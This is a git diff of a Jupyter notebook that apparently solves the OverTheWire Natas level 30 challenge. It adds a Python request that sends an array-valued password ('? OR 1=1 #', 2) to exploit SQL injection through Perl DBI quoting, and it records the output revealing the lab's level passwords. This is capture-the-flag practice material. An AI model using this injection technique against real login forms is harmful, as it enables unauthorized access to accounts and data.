--- a/Natas/natas.ipynb
+++ b/Natas/natas.ipynb
@@ -1785,19 +1785,73 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
-    "## natas30"
+    "## natas30\n"
    ]
   },
   {
    "cell_type": "code",
-   "execution_count": null,
+   "execution_count": 128,
    "metadata": {},
-   "outputs": [],
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\">\n",
+      "<head>\n",
+      "<!-- This stuff in the header has nothing to do with the level -->\n",
+      "<link rel=\"stylesheet\" type=\"text/css\" href=\"http://natas.labs.overthewire.org/css/level.css\">\n",
+      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/jquery-ui.css\" />\n",
+      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/wechall.css\" />\n",
+      "<script src=\"http://natas.labs.overthewire.org/js/jquery-1.9.1.js\"></script>\n",
+      "<script src=\"http://natas.labs.overthewire.org/js/jquery-ui.js\"></script>\n",
+      "<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src=\"http://natas.labs.overthewire.org/js/wechall.js\"></script>\n",
+      "<script>var wechallinfo = { \"level\": \"natas30\", \"pass\": \"WQhx1BvcmP9irs2MP9tRnLsNaDI76YrH\" };</script></head>\n",
+      "<body oncontextmenu=\"javascript:alert('right clicking has been blocked!');return false;\">\n",
+      "\n",
+      "<!-- morla/10111 <3  happy birthday OverTheWire! <3  -->\n",
+      "\n",
+      "<h1>natas30</h1>\n",
+      "<div id=\"content\">\n",
+      "\n",
+      "<form action=\"index.pl\" method=\"POST\">\n",
+      "Username: <input name=\"username\"><br>\n",
+      "Password: <input name=\"password\" type=\"password\"><br>\n",
+      "<input type=\"submit\" value=\"login\" />\n",
+      "</form>\n",
+      "win!<br>here is your result:<br>natas31m7bfjAHpJmSYgQWWeqRE2qVBuMiRNq0y<div id=\"viewsource\"><a href=\"index-source.html\">View sourcecode</a></div>\n",
+      "</div>\n",
+      "</body>\n",
+      "</html>\n",
+      "\n",
+      "password found: natas31m7bfjAHpJmSYgQWWeqRE2qVBu\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "True"
+      ]
+     },
+     "execution_count": 128,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
    "source": [
     "# natas30\n",
     "count = 30\n",
     "init()\n",
-    "\n"
+    "\n",
+    "data = {\n",
+    "    \"username\": \"natas31\",\n",
+    "    \"password\": [\"? OR 1=1 #\", 2],\n",
+    "}\n",
+    "url = \"http://natas30.natas.labs.overthewire.org/index.pl\"\n",
+    "res = requests.post(url, auth=auth, data=data)\n",
+    "\n",
+    "print(res.text)\n",
+    "find_pwd(res)"
    ]
   }
  ],
